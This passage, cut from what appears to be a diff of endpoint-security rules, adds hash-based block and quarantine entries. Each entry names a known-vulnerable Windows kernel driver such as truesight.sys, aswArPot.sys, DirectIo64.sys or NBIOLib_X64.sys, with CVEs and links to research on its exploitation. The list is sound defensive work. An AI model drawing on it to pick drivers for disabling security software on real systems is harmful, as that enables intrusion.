"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2f45d95d54f4e110b577e621fefa0483fa0e3dcca14c500c298fb9209e491c1", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89483c03-249d-5141-b24c-f8319bbfa2c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834106Z", + "creation_date": "2026-03-23T11:45:30.834109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b783875f123bec0082eabd4fc235f4790337b044fd7c72993ab5f118c16fb04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "895478af-e180-58ff-bc17-7e47393c44c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", 
+ "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147130Z", + "creation_date": "2026-03-23T11:45:31.147132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21cd1c9f9966b068dcc2eb4e474051a6bd7bbee40b0d034f86a45829f34cc6bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "895b48b0-1d09-5bf9-82e6-cf4e757ac4dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622599Z", + "creation_date": "2026-03-23T11:45:29.622601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "2b186926ed815d87eaf72759a69095a11274f5d13c33b8cc2b8700a1f020be1d", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89604d9c-4223-5668-88f3-d77bff91f14e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497753Z", + "creation_date": "2026-03-23T11:45:31.497757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497765Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "147ceda2d23bc576729003070127b1c0fa57d2c5a2e3f52ad7358b1f8c157f9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "896c2171-3a9a-5785-8dc8-f58deffd9594", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494529Z", + "creation_date": "2026-03-23T11:45:31.494531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "056b87911f8f7d15bbe242c3b4625bb4cbe98695a38d05c10f3bc3df8de23693", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8972a31a-1295-570b-8dc8-3aba93c6f1c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160755Z", + "creation_date": "2026-03-23T11:45:31.160757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e3120166146e5c1c0a0d07ef87fdde6356946e384b9c3ab575449f945430814", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "897c40a0-2f11-51a5-9f6c-a5116648db99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481239Z", + "creation_date": "2026-03-23T11:45:30.481241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8866f6e762dd7dea58c9e9486da53d716f3ae61048a8a10f8033b60fb5028914", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "898d7ef2-6af5-5ac2-9d92-6e3b6eb77455", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.480580Z", + "creation_date": "2026-03-23T11:45:30.480581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5df689a62003d26df4aefbaed41ec1205abbf3a2e18e1f1d51b97711e8fcdf00", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "899041eb-34cf-5965-8308-192eca166540", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478513Z", + "creation_date": "2026-03-23T11:45:30.478516Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478525Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ef8c776a6acd4fd360b22e7d053bba961d687c36ec4fcc0b3e2ff1ef7be967e", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89b3dbda-7785-578e-a386-5402b0303e86", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829771Z", + "creation_date": "2026-03-23T11:45:30.829774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de88b28e2b2a4a6a2aebd0d36a843c7dace17d4d084e0171457f15ace72c69ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89c0f68c-7fcb-5331-9d68-68e0adced549", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831018Z", + "creation_date": "2026-03-23T11:45:30.831020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.831026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b40e38733389d14ff29c73c08be4651f09b111e670cca1574961ff35bbbb93c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89c541d7-99a3-57cf-b501-544b4244c894", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473719Z", + "creation_date": "2026-03-23T11:45:30.473722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08b5f31070e370fbbf4f6e9a99c594c6e33846c82a56c773116705eda3109b62", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89c72da7-41a0-5396-9bb5-954e3ea8aaa5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160239Z", + "creation_date": "2026-03-23T11:45:31.160241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a80c261e4dc630c0b8d52eff151b6773eb533b9238163b1e84d9b0c2a8f3d386", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89c7933e-886d-5123-9a1f-358c0ab0de39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979168Z", + "creation_date": "2026-03-23T11:45:29.979170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"98a55dc61046f4509d2465cbc373a9391c07125e5f4a242d2f475f14f32e5430", + "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89c93e0e-0e92-5af5-b8f0-a297a779ee5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472637Z", + "creation_date": "2026-03-23T11:45:31.472641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "273d62b62ee2470aed571001f0385341ba2b1bcbe035a8395870c468def80daa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89f9408f-7386-57ce-af81-d4c1bb0efa43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479764Z", + "creation_date": "2026-03-23T11:45:31.479768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c149713a1c40a9cb2cbbd5846eefffa0784a07a80bf56c2138865aaa9fba4d6d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a0a9d9e-505c-54fd-9867-65a9ee49dcac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823016Z", + "creation_date": "2026-03-23T11:45:30.823018Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "096e1641d26aa971dabc7de17c0259d3aa922091e38928ba7847e4ead64b7f41", + "comment": "Vulnerable Kernel Driver (aka SysInfoDetectorX64.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a0b331e-b806-56e3-aecd-b7dfe55bbf3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498911Z", + "creation_date": "2026-03-23T11:45:31.498914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498922Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de5287a3a9d675859bda7b5c6a9a6877f9065068e7949f0cfcbb353426afcb9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a128f54-7502-50e9-9dd8-b750f196d90d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483816Z", + 
"creation_date": "2026-03-23T11:45:31.483820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483830Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26407df9f689b6dfed3be1bf1c617fdc6f75608b0c9cfc8b214db284c3aa6b8f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a26649e-8f69-5d39-b33e-04536a061794", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160136Z", + "creation_date": "2026-03-23T11:45:31.160138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160143Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7933b183cc69a05911e9612d3e3b1f743d3f666c548cacb6d3cf8699a6f0ebb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a2ebcd9-f8ba-5958-ae84-9fbbd2339601", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605825Z", + "creation_date": "2026-03-23T11:45:29.605827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1e5ca66ead46af21b7efb2229ad2901cc0017824e811990de8e5098696ae36a", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a3e90db-b3b0-5e24-bf49-463a461ea9cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810540Z", + "creation_date": "2026-03-23T11:45:31.810542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d6b6eec472134d99daf1c14a0104e87a5b269f529467abba9a5429228149995", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a504a5f-4195-5ae1-9e3a-beabad199a55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819036Z", + "creation_date": "2026-03-23T11:45:30.819038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88188ebb2dd61397d816274645cce6044489675a52d835faf518b2d137e0604c", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a5247bc-836d-5869-86ad-d85ce0c8d123", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614805Z", + "creation_date": "2026-03-23T11:45:29.614807Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614812Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8a548938-e7ea-57f5-a7d3-7f2361fa98ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 